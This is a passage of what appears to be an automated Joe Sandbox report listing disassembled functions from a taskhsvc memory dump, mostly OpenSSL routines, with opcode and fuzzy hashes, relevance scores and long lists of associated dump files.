                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_write$O_puts$J_find_sigid_algsJ_obj2nidJ_obj2txtO_indentO_printfY_asn1_findi2a_lh_retrieve
                                                            • String ID:
                                                            • API String ID: 550840016-0
                                                            • Opcode ID: 75106e644530129420ca50c399014a91aeb4c1449539c2a60943ca05e6a6540c
                                                            • Instruction ID: 358e5dfafe57f731a771c2e65c024dc821cd15f9524d0746f789ca9f33092f40
                                                            • Opcode Fuzzy Hash: 75106e644530129420ca50c399014a91aeb4c1449539c2a60943ca05e6a6540c
                                                            • Instruction Fuzzy Hash: C55115B23097029BD310AF25CA9076BBBF4AF84748F519C2DE998CBB10E735D4459B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE244D0 Relevance: 18.1, APIs: 12, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: D_currentO_lock__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2538204191-0
                                                            • Opcode ID: 4e4e9ff710229d37d2e3281e978abb933149259466c2e9c125d569d0a505b4b7
                                                            • Instruction ID: 9788490fb493fe450237f8dab64acb938ffba423094150456c10df70bc5685ca
                                                            • Opcode Fuzzy Hash: 4e4e9ff710229d37d2e3281e978abb933149259466c2e9c125d569d0a505b4b7
                                                            • Instruction Fuzzy Hash: 2F4115B05193059BEB04DF21D58574BBBF4EF81748F21881EE9984BB50D7B9D448CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF688D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: A$u
                                                            • API String ID: 4216919130-1604213488
                                                            • Opcode ID: 857c2455cc79c1d6849e05e6cc8be6208f0e80402e22334957d59cd86cd5e041
                                                            • Instruction ID: eb5b686daf8d48bfe82953b5661256b4fff078fb93584b324a9ff10443bb6fad
                                                            • Opcode Fuzzy Hash: 857c2455cc79c1d6849e05e6cc8be6208f0e80402e22334957d59cd86cd5e041
                                                            • Instruction Fuzzy Hash: DD3106725087109FDB10DF26C54064BBBF4BB8A358F068A1DE9A8A7700D375A9058FE6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE224A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 96libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow__stack_chk_failwcsstr
                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                            • API String ID: 3082766447-1672312481
                                                            • Opcode ID: 3c95a5603f054f67acd93aaf3cadcd990a4bcfee9c190eda44de19a856090303
                                                            • Instruction ID: ebe3c7379c3485e4724e7d12dea12288729da2ec90b3925dbae143e28f186f99
                                                            • Opcode Fuzzy Hash: 3c95a5603f054f67acd93aaf3cadcd990a4bcfee9c190eda44de19a856090303
                                                            • Instruction Fuzzy Hash: 8D316CB19142018BDB009F79C84979EBBF4BF45328F218629E4A8EB791D778D504CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF38D40 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_adjtime
                                                            • String ID:
                                                            • API String ID: 3724316964-3916222277
                                                            • Opcode ID: 9a3ec15e23d16caa4fededc68a9398df1ba083fa3c228592d645a2d3d2cb1aa0
                                                            • Instruction ID: 93ce2badca2b778d1e6f27a1787978c57dc7faec208788dd6ddf76cb140dec32
                                                            • Opcode Fuzzy Hash: 9a3ec15e23d16caa4fededc68a9398df1ba083fa3c228592d645a2d3d2cb1aa0
                                                            • Instruction Fuzzy Hash: 13313475909712AFDB00DF61C580A5BBBF4AF88358F41A81EE9A987700D734E848CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE7CF30 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_copyN_initN_num_bitsN_set_bitN_set_wordX_getX_start
                                                            • String ID: @
                                                            • API String ID: 968912958-2766056989
                                                            • Opcode ID: 4075ee647fb12bf265e94a0ab035130d862d502f4659062858488c77a0f69f84
                                                            • Instruction ID: 138b59462fcf946596975fc7b6d5459991f493b3808620ab6c01c1f2f69f16fd
                                                            • Opcode Fuzzy Hash: 4075ee647fb12bf265e94a0ab035130d862d502f4659062858488c77a0f69f84
                                                            • Instruction Fuzzy Hash: 453112B4519B00DFD320DF25C58479ABBF8AF85748F60982DE99987B40E738D948CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE90890 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$N1_item_newP_get_asn1_flagP_get_curve_name
                                                            • String ID: A
                                                            • API String ID: 2200182127-3554254475
                                                            • Opcode ID: c82f080ca93f80ca9d2fa00cf08ea09590bd485a4f38138a43ce7b90d81d26e2
                                                            • Instruction ID: d545f64a5d724269d4c4f72bf39af26f2bcb6525f63ae181e18480bb0ef2552b
                                                            • Opcode Fuzzy Hash: c82f080ca93f80ca9d2fa00cf08ea09590bd485a4f38138a43ce7b90d81d26e2
                                                            • Instruction Fuzzy Hash: F12125B15093818FE7009F26C58125FBBF0AF84348F518C1DE8985BB90D7B4D54ACB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2AE20 Relevance: 16.6, APIs: 11, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_load_strings$R_func_error_string__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 469510743-0
                                                            • Opcode ID: 6690d993fffff2f993094ffe450d42356ed21a0670006636d09bf0b68646ced9
                                                            • Instruction ID: 61e5f30f6ebc4fab92af278b2db4fbe3ee016ca22aeadbe67f62bfec0e1eeb75
                                                            • Opcode Fuzzy Hash: 6690d993fffff2f993094ffe450d42356ed21a0670006636d09bf0b68646ced9
                                                            • Instruction Fuzzy Hash: 745109756086008FDB00EF39C680A0AB7F1FB89318F169A5CE6A89B704D734F945CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEEC530 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
